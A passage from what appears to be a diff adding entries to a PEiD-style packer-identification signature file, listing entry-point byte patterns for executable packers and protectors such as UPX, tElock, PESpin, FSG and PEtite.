+signature = B8 93 ?? ?? 00 55 50 67 64 FF 36 00 00 67 64 89 26 00 00 BD 4B 48 43 42 B8 04 00 00 00 CC 3C 04 75 04 90 90 C3 90 67 64 8F 06 00 00 58 5D BB 00 00 40 00 33 C9 33 C0
+ep_only = true
+
+[PENightMare v1.3]
+signature = 60 E8 00 00 00 00 5D B9 ?? ?? ?? ?? 80 31 15 41 81 F9
+ep_only = true
+
+[PENightMare 2 Beta]
+signature = 60 E9 ?? ?? ?? ?? EF 40 03 A7 07 8F 07 1C 37 5D 43 A7 04 B9 2C 3A
+ep_only = true
+
+[PENinja]
+signature = 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
+ep_only = true
+
+[PENinja modified]
+signature = 5D 8B C5 81 ED B2 2C 40 00 2B 85 94 3E 40 00 2D 71 02 00 00 89 85 98 3E 40 00 0F B6 B5 9C 3E 40 00 8B FD
+ep_only = true
+
+[PEMangle]
+signature = 60 9C BE ?? ?? ?? ?? 8B FE B9 ?? ?? ?? ?? BB 44 52 4F 4C AD 33 C3
+ep_only = true
+
+[PESHiELD v0.1b MTE]
+signature = E8 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B9 1B 01 ?? ?? D1
+ep_only = true
+
+[PESHiELD v0.2 / v0.2b / v0.2b2]
+signature = 60 E8 ?? ?? ?? ?? 41 4E 41 4B 49 4E 5D 83 ED 06 EB 02 EA 04
+ep_only = true
+
+[PESHiELD v0.25]
+signature = 60 E8 2B 00 00 00
+ep_only = true
+
+[PESHiELD v0.251]
+signature = 5D 83 ED 06 EB 02 EA 04 8D
+ep_only = true
+
+[PEShit]
+signature = B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 83 F9 00 7E 06 80 30 ?? 40 E2 F5 E9 ?? ?? ?? FF
+ep_only = true
+
+[PE Spin v0.b]
+signature = EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 72 C8 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 26 E8 01 00 00 00 EA 5A 33 C9 8B 95 68 20 40 00 8B 42 3C 03 C2 89 85 76 20 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D 8A 20 40 00 8B 59 24 03 DA 8B 1B 89 9D 8E 20 40 00 53 8F 85 E2 1F 40 00 8D 85 92 20 40 00 6A 0C 5B 6A 17 59 30 0C 03 02 CB 4B 75 F8 40 8D 9D 41 8F 4E 00 50 53 81 2C 24 01 78 0E 00 FF B5 8A 20 40 00 C3 92 EB 15 68 BB ?? 00 00 00 B9 90 08 00 00 8D BD FF 20 40 00 4F 30 1C 39 FE CB E2 F9 68 1D 01 00 00 59 8D BD 2F 28 40 00 C0 0C 39 02 E2 FA 68 A0 20 40 00 50 01 6C 24 04 E8 BD 09 00 00 33 C0 0F 84 C0 08 00
+ep_only = true
+
+[PEtite v1.2]
+signature = 9C 60 E8 CA ?? ?? ?? 03 ?? 04 ?? 05 ?? 06 ?? 07 ?? 08
+ep_only = true
+
+[PEtite v1.3]
+signature =  ?? ?? ?? ?? ?? 66 9C 60 50 8D 88 ?? F0 ?? ?? 8D 90 04 16 ?? ?? 8B DC 8B E1 68 ?? ?? ?? ?? 53 50 80 04 24 08 50 80 04 24 42
+ep_only = true
+
+[PEtite v1.4]
+signature =  ?? ?? ?? ?? ?? 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC
+ep_only = true
+
+[PEtite v1.4]
+signature = 66 9C 60 50 8B D8 03 ?? 68 54 BC ?? ?? 6A ?? FF 50 14 8B CC
+ep_only = true
+
+[PEtite v2.0]
+signature = B8 ?? ?? ?? ?? 66 9C 60 50 8B D8 03 ?? 68 54 BC ?? ?? 6A ?? FF 50 18 8B CC 8D A0 54 BC ?? ?? 8B C3 8D 90 E0 15 ?? ?? 68
+ep_only = true
+
+[PEtite v2.1]
+signature = B8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 66 9C 60 50
+ep_only = true
+
+[PEtite v2.2]
+signature = B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 66 9C 60 50
+ep_only = true
+
+[PEtite vx.x]
+signature = B8 ?? ?? ?? ?? 66 9C 60 50
+ep_only = true
+
+[PEX v0.99]
+signature = E9 F5 ?? ?? ?? 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4
+ep_only = true
+
+[PEX v0.99]
+signature = 60 E8 01 ?? ?? ?? ?? 83 C4 04 E8 01 ?? ?? ?? ?? 5D 81
+ep_only = true
+
+[PKLITE32 v1.1]
+signature = 55 8B EC A1 ?? ?? ?? ?? 85 C0 74 09 B8 01 00 00 00 5D C2 0C 00 8B 45 0C 57 56 53 8B 5D 10
+ep_only = true
+
+[PKLITE32 v1.1]
+signature = 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 00 00 00 00 E8
+ep_only = true
+
+[PKLITE32 v1.1]
+signature =  ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 50 4B 4C 49 54 45 33 32 20 43 6F 70 79 72 69 67 68 74 20 31
+ep_only = true
+
+[PKLITE32 1.1 -> PKWARE Inc.]
+signature = 68 ?? ?? ?? 00 68 ?? ?? ?? 00 68 00 00 00 00 E8 ?? ?? ?? ?? E9
+ep_only = true
+
+[Private EXE v2.0a]
+signature = 53 E8 00 00 00 00 5B 8B C3 2D
+ep_only = true
+
+[Private EXE v2.0a]
+signature = EB ?? CD ?? ?? ?? ?? ?? CD ?? ?? ?? ?? ?? EB ?? EB ?? EB ?? EB ?? CD ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 50 C3
+ep_only = true
+
+[Program Protector XP v1.0]
+signature = E8 ?? ?? ?? ?? 58 83 D8 05 89 C3 81 C3 ?? ?? ?? ?? 8B 43 64 50
+ep_only = true
+
+[Protection Plus vx.x]
+signature = 50 60 29 C0 64 FF 30 E8 ?? ?? ?? ?? 5D 83 ED 3C 89 E8 89 A5 14 ?? ?? ?? 2B 85 1C ?? ?? ?? 89 85 1C ?? ?? ?? 8D 85 27 03 ?? ?? 50 8B ?? 85 C0 0F 85 C0 ?? ?? ?? 8D BD 5B 03 ?? ?? 8D B5 43 03 ?? ?? E8 DD ?? ?? ?? 89 85 1F 03 ?? ?? 6A 40 68 ?? 10 ?? ?? 8B 85 28 ?? ?? ?? 50 6A
+ep_only = true
+
+[RatPacker (Glue) stub]
+signature = 40 20 FF 00 00 00 00 00 00 00 ?? BE 00 60 40 00 8D BE 00 B0 FF FF
+ep_only = true
+
+[Shrinker v3.2]
+signature = 83 3D ?? ?? ?? ?? ?? 55 8B EC 56 57 75 65 68 00 01 ?? ?? E8 ?? E6 FF FF 83 C4 04 8B 75 08 A3 ?? ?? ?? ?? 85 F6 74 1D 68 FF
+ep_only = true
+
+[Shrinker v3.3]
+signature = 83 3D ?? ?? ?? 00 00 55 8B EC 56 57 75 65 68 00 01 00 00 E8
+ep_only = true
+
+[Shrinker v3.4]
+signature = 83 3D B4 ?? ?? ?? ?? 55 8B EC 56 57 75 6B 68 00 01 00 00 E8 ?? 0B 00 00 83 C4 04 8B 75 08 A3 B4 ?? ?? ?? 85 F6 74 23 83 7D 0C 03 77 1D 68 FF
+ep_only = true
+
+[Shrink Wrap v1.4]
+signature = 58 60 8B E8 55 33 F6 68 48 01 ?? ?? E8 49 01 ?? ?? EB
+ep_only = true
+
+[SecuPack v1.5]
+signature = 55 8B EC 83 C4 F0 53 56 57 33 C0 89 45 F0 B8 CC 3A 40 ?? E8 E0 FC FF FF 33 C0 55 68 EA 3C 40 ?? 64 FF 30 64 89 20 6A ?? 68 80 ?? ?? ?? 6A 03 6A ?? 6A 01 ?? ?? ?? 80
+ep_only = true
+
+[SmokesCrypt v1.2]
+signature = 60 B8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8A 14 08 80 F2 ?? 88 14 08 41 83 F9 ?? 75 F1
+ep_only = true
+
+[Soft Defender v1.0 - v1.1]
+signature = 74 07 75 05 19 32 67 E8 E8 74 1F 75 1D E8 68 39 44 CD ?? 59 9C 50 74 0A 75 08 E8 59 C2 04 ?? 55 8B EC E8 F4 FF FF FF 56 57 53 78 0F 79 0D E8 34 99 47 49 34 33 EF 31 34 52 47 23 68 A2 AF 47 01 59 E8 ?? ?? ?? ?? 58 05 BA 01 ?? ?? 03 C8 74 BE 75 BC E8
+ep_only = true
+
+[Soft Defender v1.1x -> Randy Li]
+signature = 74 07 75 05 ?? ?? ?? ?? ?? 74 1F 75 1D ?? 68 ?? ?? ?? 00 59 9C 50 74 0A 75 08 ?? 59 C2 04 00 ?? ?? ?? E8 F4 FF FF FF ?? ?? ?? 78 0F 79 0D
+ep_only = true
+
+[SoftSentry v2.11]
+signature = 55 8B EC 83 EC ?? 53 56 57 E9 50
+ep_only = true
+
+[SoftSentry v3.0]
+signature = 55 8B EC 83 EC ?? 53 56 57 E9 B0 06
+ep_only = true
+
+[SoftWrap]
+signature = 52 53 51 56 57 55 E8 ?? ?? ?? ?? 5D 81 ED 36 ?? ?? ?? E8 ?? 01 ?? ?? 60 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F
+ep_only = true
+
+[Spalsher v1.0 - v3.0]
+signature = 9C 60 8B 44 24 24 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 50 E8 ED 02 ?? ?? 8C C0 0F 84
+ep_only = true
+
+[Special EXE Password Protector v1.0]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 89 AD 8C 01 00 00 8B C5 2B 85 FE 75 00 00 89 85 3E 77
+ep_only = true
+
+[SPEC b2]
+signature = 55 57 51 53 E8 ?? ?? ?? ?? 5D 8B C5 81 ED ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 83 E8 09 89 85 ?? ?? ?? ?? 0F B6
+ep_only = true
+
+[SPEC b3]
+signature = 5B 53 50 45 43 5D E8 ?? ?? ?? ?? 5D 8B C5 81 ED 41 24 40 ?? 2B 85 89 26 40 ?? 83 E8 0B 89 85 8D 26 40 ?? 0F B6 B5 91 26 40 ?? 8B FD
+ep_only = true
+
+[Stealth PE v1.1]
+signature = BA ?? ?? ?? 00 FF E2 BA ?? ?? ?? 00 B8 ?? ?? ?? ?? 89 02 83 C2 03 B8 ?? ?? ?? ?? 89 02 83 C2 FD FF E2
+ep_only = true
+
+[Stone's PE Encryptor v1.0]
+signature = 55 57 56 52 51 53 E8 ?? ?? ?? ?? 5D 8B D5 81 ED 63 3A 40 ?? 2B 95 C2 3A 40 ?? 83 EA 0B 89 95 CB 3A 40 ?? 8D B5 CA 3A 40 ?? 0F B6 36
+ep_only = true
+
+[Stone's PE Encryptor v1.13]
+signature = 55 57 56 52 51 53 E8 ?? ?? ?? ?? 5D 8B D5 81 ED 97 3B 40 ?? 2B 95 2D 3C 40 ?? 83 EA 0B 89 95 36 3C 40 ?? 01 95 24 3C 40 ?? 01 95 28
+ep_only = true
+
+[Stone's PE Encryptor v2.0]
+signature = 53 51 52 56 57 55 E8 ?? ?? ?? ?? 5D 81 ED 42 30 40 ?? FF 95 32 35 40 ?? B8 37 30 40 ?? 03 C5 2B 85 1B 34 40 ?? 89 85 27 34 40 ?? 83
+ep_only = true
+
+[SVK-Protector v1.11]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED 06 ?? ?? ?? 64 A0 23
+ep_only = true
+
+[SVK-Protector v1.051]
+signature = 60 EB 03 C7 84 E8 EB 03 C7 84 9A E8 00 00 00 00 5D 81 ED 10 00 00 00 EB 03 C7 84 E9 64 A0 23 00 00 00 EB
+ep_only = true
+
+[SVK-Protector v1.32]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 06 36 42 00 64 A0 23
+ep_only = true
+
+[Symantec Visual Cafe v3.0]
+signature = 64 8B 05 ?? ?? ?? ?? 55 8B EC 6A FF 68 ?? ?? 40 ?? 68 ?? ?? 40 ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 08 50 53 56 57 89 65 E8 C7 45 FC
+ep_only = true
+
+[SOFTWrapper for Win9x/NT (Evaluation Version)]
+signature = E8 00 00 00 00 5D 8B C5 2D ?? ?? ?? 00 50 81 ED 05 00 00 00 8B C5 2B 85 03 0F 00 00 89 85 03 0F 00 00 8B F0 03 B5 0B 0F 00 00 8B F8 03 BD 07 0F 00 00 83 7F 0C 00 74 2B 56 57 8B 7F 10 03 F8 8B 76 10 03 F0 83 3F 00 74 0C 8B 1E 89 1F 83 C6 04 83 C7 04 EB EF 5F 5E 83 C6 14 83 C7 14 EB D3 00 00 00 00 8B F5 81 C6 0D 0A 00 00 B9 0C 00 00 00 8B 85 03 0F 00 00 01 46 02 83 C6 06 E2 F8 E8 06 08 00 00 68 00 01 00 00 8D 85 DD 0D 00 00 50 6A 00 E8 95 09 00 00 8B B5 03 0F 00 00 66 81 3E 4D 5A 75 33 03 76 3C 81 3E 50 45 00 00 75 28 8B 46 28 03 85 03 0F 00 00 3B C5 74 1B 6A 30 E8 99 09 00 00 6A 30 8D 85 DD 0D 00 00 50 8D 85 2B 0F 00 00 E9 55 03 00 00 66 8B 85 9D 0A 00 00 F6 C4 80 74 31 E8 6A 07 00 00 0B C0 75 23 6A 40 E8 69 09 00 00 6A 40 8D 85 DD 0D 00 00 50 8B 9D 17 0F
+ep_only = true
+
+[TASM / MASM]
+signature = 6A 00 E8 ?? ?? 00 00 A3 ?? ?? 40 00
+ep_only = true
+
+[tElock v1.00]
+signature = E9 E5 E2 FF FF
+ep_only = true
+
+[tElock v0.41x]
+signature = 66 8B C0 8D 24 24 EB 01 EB 60 EB 01 EB 9C E8 00 00 00 00 5E 83 C6 50 8B FE 68 78 01 ?? ?? 59 EB 01 EB AC 54 E8 03 ?? ?? ?? 5C EB 08
+ep_only = true
+
+[tElock v0.42]
+signature = C1 EE 00 66 8B C9 EB 01 EB 60 EB 01 EB 9C E8 00 00 00 00 5E 83 C6 52 8B FE 68 79 01 59 EB 01 EB AC 54 E8 03 5C EB 08
+ep_only = true
+
+[tElock v0.51]
+signature = C1 EE 00 66 8B C9 EB 01 EB 60 EB 01 EB 9C E8 00 00 00 00 5E 83 C6 5E 8B FE 68 79 01 59 EB 01 EB AC 54 E8 03 5C EB 08
+ep_only = true
+
+[tElock v0.4x - v0.5x]
+signature = C1 EE 00 66 8B C9 EB 01 EB 60 EB 01 EB 9C E8 00 00 00 00 5E 83 C6 ?? 8B FE 68 79 01 ?? ?? 59 EB 01
+ep_only = true
+
+[tElock v0.60]
+signature = E9 00 00 00 00 60 E8 00 00 00 00 58 83 C0 08
+ep_only = true
+
+[tElock v0.70]
+signature = 60 E8 BD 10 00 00 C3 83 E2 00 F9 75 FA 70
+ep_only = true
+
+[tElock v0.71]
+signature = 60 E8 ED 10 00 00 C3 83
+ep_only = true
+
+[tElock v0.71b2]
+signature = 60 E8 44 11 00 00 C3 83
+ep_only = true
+
+[tElock v0.71b7]
+signature = 60 E8 48 11 00 00 C3 83
+ep_only = true
+
+[tElock v0.80]
+signature = 60 E8 F9 11 00 00 C3 83
+ep_only = true
+
+[tElock v0.7x - v0.84]
+signature = 60 E8 00 00 C3 83
+ep_only = true
+
+[tElock v0.85f]
+signature = 60 E8 02 00 00 00 CD 20 E8 00 00 00 00 5E 2B C9 58 74 02
+ep_only = true
+
+[tElock v0.90]
+signature =  ?? ?? E8 02 00 00 00 E8 00 E8 00 00 00 00 5E 2B
+ep_only = true
+
+[tElock v0.92a]
+signature = E9 7E E9 FF FF 00
+ep_only = true
+
+[tElock v0.95]
+signature = E9 D5 E4 FF FF 00
+ep_only = true
+
+[tElock v0.96]
+signature = E9 59 E4 FF FF 00
+ep_only = true
+
+[tElock v0.98]
+signature = E9 25 E4 FF FF 00 00 00 ?? ?? ?? ?? 1E
+ep_only = true
+
+[tElock v0.98b1]
+signature = E9 25 E4 FF FF
+ep_only = true
+
+[tElock v0.98b2]
+signature = E9 1B E4 FF FF
+ep_only = true
+
+[tElock v0.99]
+signature = E9 ?? ?? FF FF 00 00 00 ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? 02 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 00 00 00 00 ?? ?? 02 00 00 00 00 00 ?? ?? 02 00 00 00 00 00 ?? ?? 02 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 ?? 00 00 00 00 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? 02 00 ?? ?? 02 00 ?? ?? 02 00 ?? ?? 02 00 77 ?? 02 00 ?? ?? 02 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? 00 00 00 00 00 00 ?? ?? ?? 00 00 ?? ?? 00 00 00 ?? 00 00 ?? ?? 00 ?? ?? 00 00 ?? ?? ?? 00 00 00 00 00 00
+ep_only = true
+
+[tElock 1.0 (private) -> tE!]
+signature = E9 ?? ?? FF FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 6B 65 72 6E 65 6C 33 32
+ep_only = true
+
+[The Guard Library]
+signature = 50 E8 ?? ?? ?? ?? 58 25 ?? F0 FF FF 8B C8 83 C1 60 51 83 C0 40 83 EA 06 52 FF 20 9D C3
+ep_only = true
+
+[Thinstall vx.x]
+signature = B8 EF BE AD DE 50 6A ?? FF 15 10 19 40 ?? E9 AD FF FF FF
+ep_only = true
+
+[UG2002 Cruncher v0.3b3]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? E8 0D ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 58
+ep_only = true
+
+[UPX v0.51]
+signature = 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 8D B0 D8 01 ?? ?? 83 CD FF 31 DB ?? ?? ?? ?? 01 DB 75 07 8B 1E 83 EE FC 11 DB 73 0B 8A 06 46 88 07 47 EB EB 90
+ep_only = true
+
+[UPX v0.60 - v0.61]
+signature = 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 8D B0 E8
+ep_only = true
+
+[UPX v0.62]
+signature = 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 F0 01 ?? ?? 83 CD FF 31 DB 90 90 90 EB 08 90 90 8A 06 46 88 07 47 01 DB 75 07
+ep_only = true
+
+[UPX v0.70]
+signature = 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 EC 01 ?? ?? 83 CD FF 31 DB EB 07 90 8A 06 46 88 07 47 01 DB 75 07
+ep_only = true
+
+[UPX v0.71 - v0.72]
+signature = 60 E8 00 00 00 00 83 CD FF 31 DB 5E 8D BE FA ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 81 C6 B3 01 ?? ?? EB 0A ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07
+ep_only = true
+
+[UPX v0.89.6 - v1.02 / v1.05 - v1.22 DLL]
+signature = 80 7C 24 08 01 0F 85 ?? ?? ?? 00 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF
+ep_only = true
+
+[UPX v0.80 - v0.84]
+signature =  ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 ?? ?? ?? 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF 75 09 8B 1E 83 EE FC
+ep_only = true
+
+[UPX v0.89.6 - v1.02 / v1.05 - v1.22]
+signature =  ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 ?? ?? ?? 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC
+ep_only = true
+
+[UPX Custom]
+signature = 90 90 90 90 90 90 8A 06 46 88 07 47 01 db
+ep_only = true
+
+[FSG v1.33 (Eng) -> dulek/xt]
+signature = BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF
+ep_only = true
+
+[Crypto-Lock v2.02 (Eng) -> Ryan Thian]
+signature = 60 BE 15 90 40 00 8D BE EB 7F FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47
+ep_only = true
+
+[PassLock 2000 v1.0 (Eng) -> Moonlight-Software]
+signature = 55 8B EC 53 56 57 BB 00 50 40 00 66 2E F7 05 34 20 40 00 04 00 0F 85 98 00 00 00 E8 1F 01
+ep_only = true
+
+[PESpin v0.3 (Eng) -> cyberbob]
+signature = EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46
+ep_only = true
+
+[Special EXE Pasword Protector v1.01 (Eng) -> Pavol Cerven]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 89 AD 8C 01 00 00 8B C5 2B 85 FE 75 00 00 89 85 3E
+ep_only = true
+
+[Crypto-Lock v2.02 (Eng) -> Ryan Thian]
+signature = 60 BE 15 90 40 00 8D BE EB 7F FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 03 72 0D C1 E0 08 8A 06 46 83 F0 FF 74 74 89 C5 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 75 20 41 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 83 C1 02 81 FD 00 F3 FF FF 83 D1 01 8D 14 2F 83 FD FC 76 0F 8A 02 42 88 07 47 49 75 F7 E9 63 FF FF FF 90 8B 02 83 C2 04 89 07 83 C7 04 83 E9 04 77 F1 01 CF E9 4C FF FF FF 5E 89 F7 B9 55 00 00 00 8A 07 47 2C E8 3C 01 77 F7 80 3F 01 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07
+ep_only = true
+
+[Crypto-Lock v2.02 (Eng) -> Ryan Thian]
+signature = 60 BE ?? 90 40 00 8D BE ?? ?? FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 03 72 0D C1 E0 08 8A 06 46 83 F0 FF 74 74 89 C5 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 75 20 41 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 83 C1 02 81 FD 00 F3 FF FF 83 D1 01 8D 14 2F 83 FD FC 76 0F 8A 02 42 88 07 47 49 75 F7 E9 63 FF FF FF 90 8B 02 83 C2 04 89 07 83 C7 04 83 E9 04 77 F1 01 CF E9 4C FF FF FF 5E 89 F7 B9 55 00 00 00 8A 07 47 2C E8 3C 01 77 F7 80 3F 01 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07
+ep_only = true
+
+[Exact Audio Copy -> (UnknownCompiler)]
+signature = E8 ?? ?? ?? 00 31 ED 55 89 E5 81 EC ?? 00 00 00 8D BD ?? FF FF FF B9 ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[FSG v1.00 (Eng) -> dulek/xt]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 51 FF FF FF 5F BB 28 ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE 0F 75 06 47 FF 37 AF EB 09 FE 0F 0F 84 ?? ?? ?? FF 57 55 FF 53 04 09 06 AD 75 DB 8B EC C3 1C ?? ?? 00 00 00 00 00 00 00 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> bart/xt]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 52 FF FF FF 5F BB 27 ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 07 74 EF FE 07 75 06 47 FF 37 AF EB 09 FE 07 0F 84 1A ?? ?? FF 57 55 FF 53 04 09 06 AD 75 DB 8B EC C3 1B ?? ?? 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[FSG v1.30 (Eng) -> dulek/xt]
